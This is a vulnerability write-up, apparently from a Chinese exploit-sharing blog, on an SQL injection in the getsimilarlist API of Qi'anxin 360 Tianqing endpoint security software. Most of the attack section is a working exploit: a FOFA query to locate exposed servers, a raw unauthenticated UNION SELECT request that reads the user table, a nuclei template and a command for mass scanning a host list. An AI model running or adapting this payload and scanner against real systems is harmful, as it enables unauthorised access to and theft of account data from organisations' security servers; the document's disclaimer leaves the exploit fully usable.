Qi'anxin 360 Tianqing getsimilarlist SQL injection vulnerability
Disclaimer: Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are the sole responsibility of the user; the author bears no responsibility for them. This article is for educational purposes only.
1. Product description
Qi'anxin Tianqing ("Tianqing") is the endpoint security management system of Qi'anxin Group, built for integrated endpoint security. Through a "systematic defense, digital operation" approach it helps government and enterprise customers accurately identify, protect and supervise endpoints, so that those endpoints can access data and business systems in a trustworthy, secure and compliant manner at any time [1]. [2] Tianqing is built on Qi'anxin's new "Trantuo" endpoint security platform, which integrates high-performance virus scanning, vulnerability protection and active-defense engines and incorporates threat intelligence, big-data analysis and security visualization. Its functions cover system compliance and hardening, threat prevention and detection, operations control and auditing, endpoint data-leak prevention, and unified management and operation, helping government and enterprise customers build lasting, effective endpoint security capabilities.
2. Vulnerability description
The /api/client/getsimilarlist endpoint of Qi'anxin 360 Tianqing passes the status[] query parameter into a SQL statement without sanitisation. As the PoC below shows, the injection point is the array index itself: the payload closes the application's IN list with `0,1)`, appends `union all select ... from "user"`, and ends with `where 1 in (1` so that the parenthesis the application appends still parses. The PoC request carries no session cookie or token, and it reads rows of the user table (setting, status, name and create_time).
3. Vulnerability reproduction
fofa: banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
1. Manual reproduction
```http
GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
```

(Burp screenshot)
2. Automated reproduction
① nuclei scan
```yaml
id: qianxin-360-tianqing-getsimilarlist-sqli-rce

info:
  name: qianxin-360-tianqing-getsimilarlist-sqli-rce
  author: m0be1
  severity: high
  tags: qianxin,sqli,iot
  description: Qi'anxin 360 Tianqing getsimilarlist has a SQL injection vulnerability
  metadata:
    fofa-query: banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "list"
          - "total"
          - "reason\":\"success"
        part: body
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
```
```shell
nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats
```

Note that the matchers only confirm a JSON success reply with list and total fields, which an unaffected endpoint may also return; to cut false positives, check that the injected marker 79787337 appears in the response body before reporting a hit.
② Xiaolong POC detection
The Xiaolong POC test passes.
Tool download address
Xiaolong POC portal: Xiaolong POC tool